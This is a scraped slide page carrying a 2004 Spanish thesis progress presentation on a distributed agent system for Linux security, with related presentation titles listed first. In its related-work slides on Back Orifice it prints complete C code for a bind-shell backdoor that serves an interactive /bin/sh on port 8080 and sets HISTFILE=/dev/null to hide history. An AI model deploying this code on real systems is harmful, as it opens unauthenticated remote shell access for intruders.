Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación Sistema Distribuido de Agentes con.

Slides:



Advertisements
Presentaciones similares
Por Profa. Emma Gutiérrez
Advertisements

Juan Antonio Pérez-Campanero Atanasio
Control Interno Informático. Concepto
Jorge De Nova Segundo UD9: Instalación y administración de otros servicios de red e Internet Servicio de terminal remoto.
Firewalls COMP 417.
Certificación de procesos en Linux
Tesista: Jesús Rubén Hernández Carrillo
ESET Endpoint Security y ESET Endpoint Antivirus
Diseñar un sistema que permita al usuario desde un teléfono móvil acceder a su computador personal (o servidor) a través de WAP para administrar algunos.
Sistema desarrollado Control de la Producción
Manuel H. Santander P. Equipo de Seguridad y Contingencia Informática
Ing. Horacio Carlos Sagredo Tejerina
Outpost Network Security
DETECCIÓN DE INTRUSOS rodríguez García Juan Carlos 3812
SILVIA BEATRIZ GAVILANES NARANJO KELLY VERÓNICA CARVAJAL CUJI
ESCUELA POLITÉCNICA DEL EJÉRCITO
Módulo Control de Activos e Inventario
Base de Datos Distribuidas
Conexiones remotas Por Álvaro Bustillo. Índice ¿Qué son y para que sirven? Tipos Algunos programas… Ejemplos.
SISTEMAS OPERATIVOS DE RED
1  2006 Universidad de Las Américas - Escuela de Ingeniería - Seguridad Informática – Dr. Juan José Aranda Aboy ACI – 425 SEGURIDAD INFORMÁTICA Unidad.
Requerimientos No Funcionales
Seguridad de la Información
AUDITORÍA DE SISTEMAS UNIDAD 2.
MARIO I. F. PARRA HERNÁNDEZ. SISTEMA DISTRIBUIDO DE AGENTES CON CONTROL CENTRALIZADO 05/OCTUBRE/2004 Centro de investigación y estudios avanzados del IPN.
FIREWALL.
ELEMENTOS DE UNA RED ( Parte I)
Programas computacionales para el manejo de datos, requisitos para su instalación y aplicación Jaime Escobar Melero Gerente de.
Copyright © 2006 by The McGraw-Hill Companies, Inc. All rights reserved. McGraw-Hill Technology Education Copyright © 2006 by The McGraw-Hill Companies,
Auditoría de Sistemas y Software
Diseño y Administración de Centro de Datos, Servidores, almacenamiento y Conectividad. Vamos a hablar sobre la Materia Optativa TDIV-Diseño y Administración.
Planning and Basic Dseign of a LAN M.C. Juan Carlos Olivares Rojas Department of Computer and System Instituto Tecnológico de Morelia
Protecciones complementarias contra infecciones de virus: Seguridad perimetral Grupo de profundización en Seguridad Informática - Escuela de Ingeniería.
Las etapas de un proyecto
Norman Endpoint Protection Seguridad avanzada, pero sencilla.
MICROSOFT ISA SERVER PRESENTADO A: FABIO LASSO
MÉTODOS DE IMPLANTACIÓN
Ética en el Uso de la Tecnología M.C. Juan Carlos Olivares Rojas Septiembre 2009.
SEGURIDAD EN LA INFORMACIÓN.
Copyright © 2006 by The McGraw-Hill Companies, Inc. All rights reserved. McGraw-Hill Technology Education Copyright © 2006 by The McGraw-Hill Companies,
Towards an ontology-based approach for Deriving product architectures Hacia un enfoque basado en ontología para derivar arquitecturas de producto.
FMAT, UADY Noviembre 2003 Prácticas de seguridad para Administradores.
Servicios y Servidores de Autenticación
Por: Ana Karina Andonegui Peña. Un sistema operativo de red (Network Operating System) es un componente software de una computadora que tiene como objetivo.
Los Sistemas Operativos En Red. Redes Windows
Amenazas. Tipos Gabriel Montañés León.
SEGURIDAD EN INTERNET.. INDICE.  Intrusos en tu ordenador.  Virus, troyanos y back Doors.  Cortafuegos.  Mata emergentes.  Anti–marcadores.  Anti–espias.
FIREWALL.
Teleprocesos y Sistemas Distribuidos Windows Server INTEGRANTES: Cantera Salazar, Julissa Arcelly Yalico Tello, Diana Accho Flores, Wilber Dávila, Mireilli.
Pág. 1 Computación Avanzada y Sistemas Empresariales, S.A. de C.V. Servicios de Auditoría y Seguridad de Sistemas de Información y Bases de Datos Noviembre.
Gabriel Montañés León.  El sistema de nombres de dominio (DNS, Domain Name System) se diseñó originalmente como un protocolo. Antes de considerar qué.
Punto 3 – Servicios de Terminal Remoto Juan Luis Cano.
* SSL * Clave de seguridad * Provee cifrado de datos, autentificación de servidor y cliente(opcional) e integridad * Almacenamiento de información formato.
INTRODUCCIÓN A LA INFORMÁTICA BÁSICA
APACHE WEB SERVER El proyecto Apache Web Server es un desarrollo de software en colaboración, enfocado en crear una implementación de un servidor HTTP.
Seguridad de Datos IDS e IPS.
SISTEMAS OPERATIVOS Son un conjunto de programas destinados a permitir la comunicación entre el usuario y en computador y gestionar sus recursos.
Una parte esencial del trabajo informático es mantener protegida, resguardada y respaldada la información con la cual se trabaja, pues de todo ello depende.
 Protección contra problemas de corriente.  Protección por contraseñas.  Protección con Backup.  Protección contra intrusos (Internet).
QUE ES EL TELNET El protocolo Telnet es un protocolo de Internet estándar que permite conectar terminales y aplicaciones en Internet.
FIREWALLS, Los cortafuegos
APLICACIONES EN LINEA.
Evelin Ramos Cabrera 1° B
 PROBLEMA DE INVESTIGACIÓN PROBLEMA DE INVESTIGACIÓN  MARCO TEÓRICO MARCO TEÓRICO  ESTUDIO ACTUAL DE LA RED DE LA INSTITUCIÓN, HONEYPOTS A INSTALAR.
REDES Angie Paola Gutiérrez C. ♥ Once ♥. REDES DE COMPUTADORAS Es un conjunto de elementos interceptados entre si, para compartir información. Como en.
Recomendaciones en la detección de una APT Firewalls Análisis Forense del tráfico de red HIDS Correlación
Gestión de versiones. Cronograma Conceptos introductorios Arquitecturas posibles Riesgos en la no utilización Herramientas.
Es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas. Se.
DOCENTE: CLAUDIA ESTHER DOMÍNGUEZ BRIGIDO CBTIS 242 CUETZALAN DEL PROGRESO, PUE.
Protección de un servicio Web 1.Autenticación. 2.Gestión de usuarios y grupos. 3.Gestión de servicios. 4.Gestión de sistema de ficheros. 5.Firewall. 6.Prevención.
Transcripción de la presentación:

Centro de Investigación y de Estudios Avanzad del IPN. Departamento de Ingeniería Eléctrica. Sección de Computación Sistema Distribuido de Agentes con Control Centralizado de seguridad. Tesista: Mario Irán Florentino Parra Hernández. Director de tesis: Dr. Jorge Buenabad Chávez. 09 / Nov. / 2004

Antecedentes. Limitantes. Objetivos. Metodologia Conograma. Productos esperados. Avances. Referencias. Agenda. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Antecedentes. En los últimos años Internet a permitido nuevas formas de comunicación entre sistemas computacionales. Por lo que se han creado mecanismos de seguridad que tratan de prevenir accesos sin autorización como son: Protección perimetral (firewalls). Sistemas de Detección de Intrusos ( SDIs). Antivirus. VPN. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Antecedentes ( Cont.) El crecimiento del Internet implica riesgos de seguridad en los sistemas computacionales por eventos maliciosos como son: Personas no autorizadas que acceden desde Internet. Virus Informático se encuentran en constante acoso a sistemas desde Internet. Usuarios autorizados que intentan tener privilegios adicionales. Usuarios abusan de los privilegios otorgados Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Limitantes. Las limitantes que presentan los sistemas de seguridad es su Confiabilidad. Trabajan con reglas de seguridad que con el tiempo tienden hacer obsoletas.

Objetivos Objetivo General. Desarrollar un sistema distribuido de agentes con control centralizado que administre la seguridad en sistemas distribuidos en plataforma LINUX. Objetivo Particular. Implementar agentes en sistemas red en plataforma LINUX que administren la seguridad en cada estación de trabajo. Implementación de una interfaz grafica que administre a los agentes mediante protocolos de comunicación y autentificación.

Esquematización. Internet Red interna Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 CONTROL CENTRALIZADO

Metodologia. Etapa 1 Análisis y selección. Agentes. Obtención de privilegio de en Linux. Protocolos de Comunicación y Autentificación. GTK. Etapa 2 Diseño Etapa 3 Implementación. Etapa 4 Pruebas. Etapa 5 Documentación de la tesis.

Cronograma Etapa An á lisis y Selecci ó n. ( Desarrollo de Protocolo) Dise ñ o. Implementaci ó n. Pruebas. Documentaci ó n. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Productos esperados. Desarrollo de Agentes sobre Linux. Desarrollo del Control Centralizado administrador de los agentes. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Avance Back Orifice. Es una pequeña utilidad para el control remoto de equipos. Se compone basicamente de dos elementos: el cliente y el servidor. Controlar remotamente estaciones Windows. Desarrollado por un grupo de Hacker que se hacen llamar Cult of the Dead Cow. Se distribuyen como si fuera un virus por lo que no es muy confiable. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 Trabajo Relacionado.

Avance (Cont.) Back Orifice. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004

Avace (Cont). Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 #include #define DEFAULT_PORT 8080 int main(int argc,char **argv) { char *name[3];char *env[2]; int fd,fd2,fromlen; int port; struct sockaddr_in serv; unsigned char *ptr; port=DEFAULT_PORT; signal(SIGCHLD,sig_hand); if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { exit(1); } serv.sin_addr.s_addr=0; serv.sin_port=htons(port); serv.sin_family=AF_INET; if(bind(fd,(struct sockaddr *)&serv,16)) { exit(1); } if(listen(fd,5)) { exit(1); } for(;;) { fromlen=sizeof(struct sockaddr); fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); if (fd2<0) continue; if (fork()) { close(fd2); } else { close(fd); /* Se redirecciona la entrada y salida*/ dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); name[0]="/bin/sh"; name[1]="-i"; name[2]=NULL; env[0]="HISTFILE=/dev/null"; env[1]=NULL; execve(name[0],name,env); exit(1); } } } UNIX Network Programming

Avance (Cont). Herramienta para el desarrollo de software basado en agentes tanto de carácter comercial como académico. Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004 AgentBuilder

Referencias UNIX Network Programming, Volume 1, Second Edition: Networking APIs: Sockets and XTI, Prentice Hall, Richard Stevens. UNIX Network Programming, Volume 2, Second Edition: Interprocess Communications, Prentice Hall, Richard Stevens. Allen Julie, et al, “State of the Practice of Intrusion Detection Technologies”, Carnegie Mellon Software Enginneering Institute, January Caswell Brian, Roesh Marty, Snort The Open Source Network Intrusion Detection System, Mario Parra. Sistema Distribuido de Agentes con Control Centralizado de Seguridad. 09/Nov. / 2004